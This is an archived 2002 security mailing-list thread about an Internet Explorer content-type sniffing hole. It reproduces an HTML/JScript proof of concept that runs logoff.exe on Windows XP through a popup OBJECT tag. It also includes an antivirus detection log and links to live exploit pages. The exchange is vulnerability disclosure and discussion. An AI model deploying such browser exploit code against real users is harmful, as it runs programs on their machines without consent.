Fw: [Re: Rather large MSIE-hole] another variant

["madness" <madness () diffusion net>]

FYI - Norton AV now picks this up.


Scan type:  Realtime Protection Scan
Event:  Virus Found!
Virus name: XMLid.Exploit
File:  C:\XXXXX\Local Settings\Temporary Internet
Files\Content.IE5\C9IVKTMJ\simplebind[1].htm
Location:  Quarantine
Computer:  XXXXXX
User:  XXXXXX
Action taken:  Clean failed : Quarantine succeeded : Access denied
Date found: Fri Mar 15 19:46:32 2002

madness.


----- Original Message -----
From: "NoCoNFLiC" <nocon () castleblack darkflame net>
To: "Magnus Bodin" <magnus () bodin org>
Cc: <vuln-dev () securityfocus com>
Sent: Friday, March 15, 2002 3:49 PM
Subject: FW: [Re: Rather large MSIE-hole] another variant


> [magnus () bodin org] Tue, Mar 12, 2002 at 11:32:20AM +0100 wrote:
> > The latest MSIE-hole is now spreading.
> >
> > THE ATTACHED HTML-code is served as a jpeg-file, and as MSIE ignores the
> > Content-Type if it "thinks" it knows better, then the code is executed.
> > This in combination with the malicious code that is possible to run,
then
> > an "innocent.jpg" with the following content will log off an XP-user.
> >
> > --%< cut here-----
> > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
> > <HTML>
> > <HEAD>
> > <TITLE>IE6 security...</TITLE>
> >
> > <META http-equiv=Content-Type content="text/html; charset=windows-1252">
> > <SCRIPT language=JScript>
> >
> > var programName=new Array(
> >     'c:/windows/system32/logoff.exe',
> >     'c:/winxp/system32/logoff.exe',
> >     'c:/winnt/system32/logoff.exe'
> > );
> >
> > function Init(){
> >     var oPopup=window.createPopup();
> >     var oPopBody=oPopup.document.body;
> >     var n,html='';
> >     for(n=0;n<programName.length;n++)
> >         html+="<OBJECT NAME='X'
> > CLASSID='CLSID:11111111-1111-1111-1111-111111111111' C
> >     oPopBody.innerHTML=html;
> >     oPopup.show(290, 390, 200, 200, document.body);
> > }
> >
> > </SCRIPT>
> > </head>
> > <BODY onload="Init()">
> > You should feel lucky if you dont have XP right now.
> > </BODY>
> > </HTML>
> > --%< cut here-----
> >
> >
> > --
> > magnus                               MICROS~1 BOB was written in Lisp.
> >             http://x42.com/
>
>
>    Just passing this along, as some may not be on the sec-basics list.
>
> -----Original Message-----
> From: Sprissler, Noah [mailto:NSPRISSLER () PARTNERS ORG]
> Sent: March 12, 2002 10:31
> To: security-basics () security-focus com
> Subject: RE: scary site
>
> That's interesting.  I have disabled active scripting as most have
suggested
> and the http://www.liquidwd.freeserve.co.uk/ link stops bringing up a DOS
> prompt.  However, if I goto this link from Greymagic
> http://security.greymagic.com/adv/gm001-ie/simplebind.html their
> implementation of this works fine no matter what settings I disable.
Win2k
> with all patches, IE6 with all patches.
>
> -Noah
>
> -----Original Message-----
>
> --
>
> - nocon
>
> ======================================
>
> nocon () darkflame net
> http://nocon.darkflame.net
>
> ======================================